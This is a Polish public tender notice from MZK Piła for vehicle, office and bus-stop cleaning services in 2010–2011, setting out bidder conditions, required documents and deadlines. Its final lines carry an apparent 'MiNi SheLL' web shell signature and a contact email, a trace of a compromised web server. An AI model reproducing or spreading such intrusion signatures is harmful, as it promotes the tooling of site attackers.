<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonał co najmniej jedną usługę o charakterze zgodnym z przedmiotem zamówienia z podaniem ich wartości, daty wykonania, potwierdzonej dokumentem np. referencją na dowód, że usługa została wykonana z należytą starannością.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/ w warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, iż dysponuje pracownikami dla:
zad. 1 minimum 3 osoby
zad. 2 minimum 2 osoby
zad. 3 minimum 2 osoby</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada polisę lub inny dokument ubezpieczeniowy potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie potwierdzonej działalności gospodarczej. Wykonawca, którego oferta wybrana zostanie jako najkorzystniejsza, przed podpisaniem umowy winien przedłożyć polisę lub inny dokument ubezpieczeniowy potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej na kwotę nie niższą niż 250 000,00 zł. Na jedno i wszystkie zdarzenia w okresie realizacji umowy.
W przypadku złożenia oferty wspólnej warunki wyszczególnione w tym punkcie Wykonawcy muszą spełnić łącznie.
Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu na podstawie oświadczeń i dokumentów na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pełnomocnictwo do reprezentowania w postępowaniu, (w przypadku podmiotów występujących wspólnie) -    przygotowane zgodnie z zapisami części VII pkt. 4 SIWZ.
2.Parafowany projekt umowy  - załącznik nr 6,7,8
3. Referencje,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy w przypadku zmian w przepisach prawnych dotyczących zmiany stawki podatku VAT.
Zamawiający przewiduje możliwość wcześniejszego wypowiedzenia umowy lub części umowy, w rzaie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie będzie leżało w interewsie publicznym czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający odstąpi od umowy w terminie 30 dni od podwzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mzk.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.mzk.pila.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2010 godzina 08:00, miejsce: sekretariat MZK Piła Sp. z o.o., ul. Łączna 4, 64-920.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sprzątanie i mycie pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzątanie i mycie pojazdów,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.70.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> sprzątanie pomieszczeń biurowych i przemysłowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzątanie pomieszczeń biurowych i przemysłowych,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sprzątanie i odśnieżanie przystanków autobusowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sprzątanie i odśnieżanie przystanków autobusowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com